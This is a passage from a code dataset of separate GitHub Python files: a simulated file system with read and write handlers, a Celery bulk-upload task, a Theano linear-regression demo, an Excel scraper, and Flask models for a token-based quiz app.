File:\n        f = File(self.name, self.parent)\n        f.contents = self.contents\n        return f\n\n    # Deep copy this file in the same dir with new_name\n    # returns the new file\n    def copy_in_place(self, new_name: str) -> File:\n        if (new_name == self.name):\n            raise Exception(\"Can't copy file with same name\")\n        else:\n            f = File(new_name, self.parent)\n            self.parent.add_existing_file(f)\n            f.contents = self.contents\n            return f\n\n# Allows reading and writing of file in chunks\nclass FileHandler:\n    def __init__(self, file: File):\n        self.file = file\n        self.cursor = 0 # Used to maintain current position\n        self.is_open = False\n\n    # Moves the cursor to absolute index\n    # Returns T/F for success/fail\n    def move_cursor_abs(self, i: int) -> bool:\n        if (i < 0 or i > len(self.file.contents)):\n            print(\"Cursor value out of bounds\")\n            return False\n        self.cursor = i\n        return True\n\n    # Moves the cursor relative to current index\n    # Negative int will move it backward\n    # Returns T/F for success/fail\n    def move_cursor_rel(self, i: int) -> bool:\n        new_pos = self.cursor + i\n        # same bound as move_cursor_abs, so the cursor may sit at EOF\n        if (new_pos < 0 or new_pos > len(self.file.contents)):\n            print(\"Cursor value out of bounds\")\n            return False\n        self.cursor = new_pos\n        return True\n\n    # If i is out of bounds, round i to 0 or EoF\n    def _round_index(self, i: int) -> int:\n        if i > len(self.file.contents):\n            i = len(self.file.contents)\n        if i < 0:\n            i = 0\n        return i\n\n\nclass ReadHandler(FileHandler):\n    # Read next i chars\n    def read_next(self, i: int) -> str:\n        if not self.is_open:\n            raise Exception(\"Cannot read from unopened handler\")\n        new_index = self._round_index(self.cursor+i)\n        output = self.file.contents[self.cursor:new_index]\n        self.cursor = new_index\n        return output\n\n    # Read from cursor to end\n    def read_to_end(self) -> str:\n        if not self.is_open:\n            raise Exception(\"Cannot read from unopened handler\")\n        output = self.file.contents[self.cursor:]\n        self.cursor = len(self.file.contents)\n        return output\n\n    # Stream output until the next newline starting from cursor\n    def read_line(self) -> str:\n        if not self.is_open:\n            raise Exception(\"Cannot read from unopened handler\")\n        output = \"\"\n        for i in range(self.cursor, len(self.file.contents)):\n            c = self.file.contents[self.cursor]\n            output += c\n            self.cursor = 
self._round_index(self.cursor + 1)\n if (c == \"\\n\"):\n break\n return output\n\n # Outputs all file contents, doesn't move cursor\n def read(self) -> str:\n if not self.is_open:\n raise Exception(\"Cannot read from unopened handler\")\n return self.file.contents\n\n # Opening a read handler is always successful\n def open(self) -> bool:\n self.file.read_handlers.add(self)\n self.is_open = True\n self.cursor = 0\n return True\n\n # Close the handler\n def close(self) -> None:\n self.file.read_handlers.remove(self)\n self.is_open = False\n\n\nclass WriteHandler(FileHandler):\n # Overwrites file contents\n def write(self, contents: str) -> None:\n if not self.is_open:\n raise Exception(\"Cannot write with unopened handler\")\n self.file.contents = contents\n self.cursor = len(self.file.contents)\n\n # Appends file contents to end\n def concat(self, contents: str) -> None:\n if not self.is_open:\n raise Exception(\"Cannot write with unopened handler\")\n self.file.contents += contents\n self.cursor = len(self.file.contents)\n\n # Inserts contents at current cursor\n # Cursor now points to cursor + len(contents)\n def insert(self, contents: str) -> None:\n if not self.is_open:\n raise Exception(\"Cannot write with unopened handler\")\n c = self.file.contents\n self.file.contents = c[0:self.cursor] + contents + c[self.cursor:]\n self.cursor = self.cursor + len(contents)\n\n # Open the write handler\n # Returns false if an open one already exists\n\n def open(self) -> bool:\n if (self.file.write_handler is None):\n self.file.write_handler = self\n self.is_open = True\n self.cursor = 0\n return True\n else:\n return False\n\n # Close the handler\n def close(self) -> None:\n self.file.write_handler = None\n self.is_open = False\n","repo_name":"daniell289/material_security","sub_path":"objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":8254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32853701991","text":"from celery.task import task\nfrom django.core.cache import cache\nimport uuid\nfrom soil import CachedDownload\nfrom corehq.apps.users.bulkupload import create_or_update_users_and_groups\n\n@task\ndef bulk_upload_async(download_id, domain, user_specs, group_specs, location_specs):\n results = create_or_update_users_and_groups(\n domain,\n user_specs,\n group_specs,\n location_specs\n )\n temp_id = uuid.uuid4().hex\n expiry = 60*60\n cache.set(temp_id, results, expiry)\n cache.set(download_id, CachedDownload(temp_id, content_disposition=\"\",\n mimetype=\"text/html\"), expiry)\n","repo_name":"gmimano/commcaretest","sub_path":"corehq/apps/users/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23842035207","text":"from theano import tensor as T, In, function, shared, config\nimport numpy as np\n\nclass linreg(object):\n \"\"\"A quick implementation of Linear Regression\n \"\"\"\n\n def __init__(self):\n self.X = T.scalar('X')\n self.Y = T.scalar('Y')\n self.W = shared(np.asarray(0., dtype=config.floatX), 'W')\n\n self.y = self.X * self.W\n self.cost = T.mean(T.sqr(self.y - self.Y))\n self.gradient = T.grad(cost=self.cost, wrt=self.W)\n self.update = self.W - self.gradient * 0.01\n\n self.train = function(inputs=[self.X, self.Y], outputs=self.cost, updates=[(self.W, self.update)], allow_input_downcast=True, name='train')\n\ndef main():\n #import matplotlib\n 
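#matplotlib.use('TkAgg')\n\n    # usage note (added here; not in the original repo): each lr.train(x, y) call\n    # below runs one SGD step and returns the squared-error cost computed before\n    # the weight update, so a fresh model gives linreg().train(1.0, 2.0) -> 4.0\n    # because W starts at 0 and (0*1 - 2)**2 == 4\n    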
import matplotlib.pyplot as plt\n\n    train_x = np.linspace(-1, 1, 101)\n    train_y = 2 * train_x + np.random.randn(*train_x.shape) * 0.33\n\n    lr = linreg()\n\n    for i in range(100):\n        for (x, y) in zip(train_x, train_y):\n            lr.train(x, y)\n\n    fig, ax = plt.subplots()\n    ax.scatter(train_x, train_y)\n    ax.plot(train_x, lr.W.get_value() * train_x, color='red')\n    fig.show()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"smakonin/TheanoFun","sub_path":"LinearRegression.py","file_name":"LinearRegression.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"73462773814","text":"import xlrd\n\n#def clean(response):\n\n\n# note: xlrd.open_workbook takes no file-mode argument (its second positional\n# parameter is a logfile), so the stray \"rb\" has been dropped\ndata = xlrd.open_workbook(\"Responses_All About the RMP2031.xlsx\")\nsheets = data.sheet_names()\nfile=open(\"scraped.txt\",\"w\")\nfor sheet_name in sheets:\n    sh = data.sheet_by_name(sheet_name)\n    i=0\n    for rownum in range(sh.nrows):\n        row_val = sh.row_values(rownum)\n        if row_val[3]:\n            #cleaned = clean(row_val[3])\n            file.write(str(i)+ '-' + row_val[3]+'\\n')\n            i+=1\nfile.close()\n\n","repo_name":"Chintan2108/Text-Classification-and-Context-Mining-for-Document-Summarization","sub_path":"pre/Pre Processing/cleaner.py","file_name":"cleaner.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"}
{"seq_id":"27228987485","text":"# app/models.py\r\nimport base64\r\nimport os\r\nfrom datetime import datetime, timedelta\r\nfrom time import time\r\nfrom hashlib import md5\r\nfrom flask import current_app, redirect, request, url_for\r\nfrom app import db\r\nfrom functools import wraps\r\n\r\n\r\nclass User(db.Model):\r\n    id = db.Column(db.Integer, primary_key=True)\r\n    first_name = db.Column(db.String(64), nullable=False, unique=False)\r\n    last_name = db.Column(db.String(64), nullable=False, unique=False)\r\n    email = db.Column(db.String(120), index=True, nullable=False, unique=True)\r\n    token = db.Column(db.String(120), index=True, nullable=False, unique=True)\r\n    token_expire_time = db.Column(db.DateTime, index=True, nullable=False)\r\n    # pass the callable (not datetime.utcnow()) so each insert gets a fresh timestamp\r\n    created = db.Column(db.DateTime, index=True,\r\n                        nullable=False, default=datetime.utcnow)\r\n    questions = db.relationship(\"UserQuestion\", backref=\"user\", lazy='dynamic')\r\n\r\n    def last_answered_question_id(self):\r\n        last_answered = (self.questions.filter_by(is_answered=True).order_by(\r\n            UserQuestion.question_id.desc())).first()\r\n        return last_answered.question_id if last_answered else None\r\n\r\n    def get_last_unanswered_question_id(self):\r\n        last_unanswered_user_question = (self.questions.filter_by(is_answered=False).order_by(\r\n            UserQuestion.question_id.desc())).first()\r\n        return last_unanswered_user_question.question_id if last_unanswered_user_question else None\r\n\r\n    def get_next_question(self):\r\n        next_question = None\r\n        last_unanswered_user_question = (self.questions.filter_by(is_answered=False).order_by(\r\n            UserQuestion.question_id.desc())).first()\r\n\r\n        current_app.logger.debug(\r\n            \"[get_next_question] last_unanswered_user_question\")\r\n        current_app.logger.debug(last_unanswered_user_question)\r\n\r\n        if last_unanswered_user_question:\r\n            next_question = db.session.query(Question).filter(\r\n                Question.id == last_unanswered_user_question.question_id).first()\r\n        else:\r\n            last_answered_id = self.last_answered_question_id() or 0\r\n            next_question = db.session.query(Question).filter(\r\n                Question.id > 
last_answered_id).order_by(Question.id).first()\r\n\r\n return next_question\r\n\r\n # Sample Answer Format\r\n # {\r\n # \"AnsweredText\": \"42\",\r\n # \"ChildQuestionAnsweredText\": null,\r\n # \"ChildQuestionAnsweredText2\": null,\r\n # \"OptionId\": null,\r\n # \"QuestionId\": \"4\"\r\n # }\r\n\r\n def save_the_answer_to_db(self, answer_data):\r\n answer = None\r\n\r\n user_question_asked = self.questions.filter_by(\r\n question_id=answer_data[\"QuestionId\"]).first()\r\n if user_question_asked is None:\r\n # TODO Throw an error!\r\n current_app.logger.error(\r\n \"[save_the_answer_to_db] Question must be asked before its answered!\")\r\n return\r\n\r\n answered_question = Question.query.filter_by(\r\n id=answer_data[\"QuestionId\"]).first()\r\n\r\n if answered_question is None:\r\n current_app.logger.error(\r\n \"[save_the_answer_to_db] No Question for id \" + answer_data[\"QuestionId\"])\r\n return\r\n\r\n current_app.logger.debug(\"[save_the_answer_to_db] Answered Question\")\r\n current_app.logger.debug(answered_question)\r\n current_app.logger.debug(\"[save_the_answer_to_db] Users Answer\")\r\n current_app.logger.debug(answer_data)\r\n\r\n if answer_data[\"OptionId\"] is not None:\r\n option = answered_question.options.filter(\r\n Option.id == answer_data[\"OptionId\"]).first()\r\n # TODO use this or the user_question.is_correct field\r\n if option is None:\r\n current_app.logger.error(\r\n \"Option, \" + str(answer_data[\"OptionId\"]) + \", doesn't exist for this question!\")\r\n else:\r\n answer = option.body\r\n elif answer_data[\"AnsweredText\"] is not None:\r\n answer = answer_data[\"AnsweredText\"]\r\n elif answer_data[\"ChildQuestionAnsweredText\"] is not None:\r\n answer = answer_data[\"ChildQuestionAnsweredText\"]\r\n elif answer_data[\"ChildQuestionAnsweredText2\"] is not None:\r\n answer = answer_data[\"ChildQuestionAnsweredText2\"]\r\n else:\r\n # TODO re-submit the question, or throw an error?\r\n current_app.logger.error(\"You must answer the question\")\r\n\r\n if str(answer) == str(answered_question.answer):\r\n user_question_asked.is_correct = True\r\n else:\r\n user_question_asked.is_correct = False\r\n user_question_asked.is_answered = True\r\n db.session.commit()\r\n\r\n def save_the_question_to_db(self, question_id):\r\n asked_question = Question.query.filter_by(id=question_id).first()\r\n current_app.logger.debug(\"[save_the_question_to_db] Asked Question\")\r\n current_app.logger.debug(asked_question)\r\n\r\n # Check if it the user was asked this question\r\n user_question = self.questions.filter_by(\r\n question_id=asked_question.id).first()\r\n current_app.logger.debug(\r\n \"[save_the_question_to_db] Existing User Question\")\r\n current_app.logger.debug(user_question)\r\n\r\n if not user_question:\r\n user_question = UserQuestion(user_id=self.id, question_id=asked_question.id,\r\n is_answered=False, is_correct=False)\r\n db.session.add(user_question)\r\n db.session.commit()\r\n current_app.logger.debug(\r\n \"[save_the_question_to_db] New User Question\")\r\n current_app.logger.debug(user_question)\r\n return user_question\r\n\r\n def create_reset_token(self, expires_in=3600):\r\n if not self.token:\r\n # '/' in the token will cause a routing error\r\n self.token = (base64.b64encode(os.urandom(24)).decode('utf-8')).replace('/','X')\r\n\r\n self.token_expire_time = datetime.utcnow() + timedelta(seconds=expires_in)\r\n return self.token if (expires_in > 1) else None\r\n\r\n def remove_token(self):\r\n self.create_reset_token(-1)\r\n\r\n def 
get_token(self):\r\n        return self.token if (self.token_expire_time > datetime.utcnow()) else None\r\n\r\n    def get_username(self):\r\n        return self.first_name.capitalize() + ' ' + self.last_name.capitalize()\r\n\r\n    @staticmethod\r\n    def verify_user_token(token):\r\n        current_app.logger.debug(\"[verify_user_token] Token: \" + token)\r\n        current_user = User.query.filter_by(token=token).first()\r\n        return current_user if (current_user and current_user.token_expire_time > datetime.utcnow()) else None\r\n\r\n    def to_dict(self):\r\n        delta_time = datetime.utcnow() - self.created\r\n        remaining_time = self.token_expire_time - datetime.utcnow()\r\n\r\n        data = {\r\n            'id': self.id,\r\n            'username': self.get_username(),\r\n            'first_name': self.first_name,\r\n            'last_name': self.last_name,\r\n            'email': self.email,\r\n            'token_expire_time': self.token_expire_time.isoformat() + 'Z' if self.token_expire_time else None,\r\n            'delta_time_seconds': int(delta_time.total_seconds()),\r\n            'remaining_time_seconds': int(remaining_time.total_seconds()),\r\n        }\r\n        return data\r\n\r\n    def from_dict(self, data):\r\n        for field in ['first_name', 'last_name', 'email']:\r\n            if field in data:\r\n                setattr(self, field, data[field])\r\n\r\n        setattr(self, 'token', self.create_reset_token())\r\n\r\n    def __repr__(self):\r\n        return '<User {}, {}>'.format(self.first_name + ' ' + self.last_name, self.email)\r\n\r\n\r\n# ------------------------------------------------------------------------------\r\n# Decorator for verifying the Token\r\n# ------------------------------------------------------------------------------\r\n\r\n\r\ndef token_required(f):\r\n    @wraps(f)\r\n    def decorated(*args, **kwargs):\r\n        current_user_token = request.view_args['user_token'] if 'user_token' in request.view_args else None\r\n\r\n        if not current_user_token:\r\n            current_app.logger.debug(\"[token_required] No Token -> Register\")\r\n            return redirect(url_for('auth.register'), code=307)\r\n\r\n        current_user = User.verify_user_token(current_user_token)\r\n\r\n        if current_user is None:\r\n            current_app.logger.debug(\r\n                \"[token_required] No user for token \" + current_user_token + \" -> Register\")\r\n            return redirect(url_for('auth.register'))\r\n\r\n        current_app.logger.debug(\r\n            \"[token_required] User: \" + current_user.get_username())\r\n\r\n        return f(current_user)\r\n\r\n    return decorated\r\n# ------------------------------------------------------------------------------\r\n# Question Class\r\n# ------------------------------------------------------------------------------\r\n\r\n\r\nclass Question(db.Model):\r\n    id = db.Column(db.Integer, primary_key=True)\r\n    body = db.Column(db.String(240), unique=True, nullable=False)\r\n    answer = db.Column(db.String(60), unique=False, nullable=False)\r\n    options = db.relationship('Option', backref='question', lazy='dynamic')\r\n    files = db.relationship('File', backref='question', lazy='dynamic')\r\n    users = db.relationship(\"UserQuestion\", backref=\"question\", lazy='dynamic')\r\n\r\n    def to_dict(self):\r\n        data = {\r\n            'id': self.id,\r\n            'body': self.body,\r\n            'answer': self.answer,\r\n            'options': ([option.to_dict() for option in self.options.all()]),\r\n            'files': ([file.to_dict() for file in self.files.all()]),\r\n        }\r\n        return data\r\n\r\n    def __repr__(self):\r\n        return '<Question {}: {} (answer: {})>'.format(self.id, self.body, self.answer)\r\n\r\n\r\n# ------------------------------------------------------------------------------\r\n# Bridging Table Between User and their Questions\r\n# 
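------------------------------------------------------------------------------\r\n\r\n# Example row (illustrative, not part of the original file):\r\n#   UserQuestion(user_id=1, question_id=4, is_answered=True, is_correct=False)\r\n# records that user 1 answered question 4 and got it wrong.\r\n\r\n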
class UserQuestion(db.Model):\r\n    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), primary_key=True)\r\n    question_id = db.Column(db.Integer, db.ForeignKey(\r\n        'question.id'), primary_key=True)\r\n    is_answered = db.Column(db.Boolean, nullable=False, default=0)\r\n    is_correct = db.Column(db.Boolean, nullable=False, default=0)\r\n    db.UniqueConstraint('user_id', 'question_id', name='user_question_uix_1')\r\n    users = db.relationship(\"User\", backref=\"question\")\r\n    questions = db.relationship(\"Question\", backref=\"user\")\r\n\r\n    def answered_already(self, user_id=99):\r\n        current_app.logger.debug(\"[answered_already] User Id: \" + str(user_id))\r\n        return self.query.filter_by(user_id=user_id, is_answered=1).order_by(self.question_id)\r\n\r\n    def to_dict(self):\r\n        data = {\r\n            'user_id': self.user_id,\r\n            'question_id': self.question_id,\r\n            'is_answered': self.is_answered,\r\n            'is_correct': self.is_correct,\r\n        }\r\n        return data\r\n\r\n    def __repr__(self):\r\n        return '<UserQuestion user={} question={} correct={}>'.format(self.user_id, self.question_id, self.is_correct)\r\n# ------------------------------------------------------------------------------\r\n# Option Class\r\n# ------------------------------------------------------------------------------\r\n\r\n\r\nclass Option(db.Model):\r\n    id = db.Column(db.Integer, primary_key=True)\r\n    body = db.Column(db.String(240), unique=False, nullable=False)\r\n    question_id = db.Column(db.Integer, db.ForeignKey('question.id'))\r\n    is_answer = db.Column(db.Boolean, default=0)\r\n    db.UniqueConstraint('body', 'question_id', name='question_option_uix_1')\r\n\r\n    def to_dict(self):\r\n        data = {\r\n            'id': self.id,\r\n            'body': self.body,\r\n            'question_id': self.question_id,\r\n            'is_answer': self.is_answer,\r\n        }\r\n        return data\r\n\r\n    def __repr__(self):\r\n        return '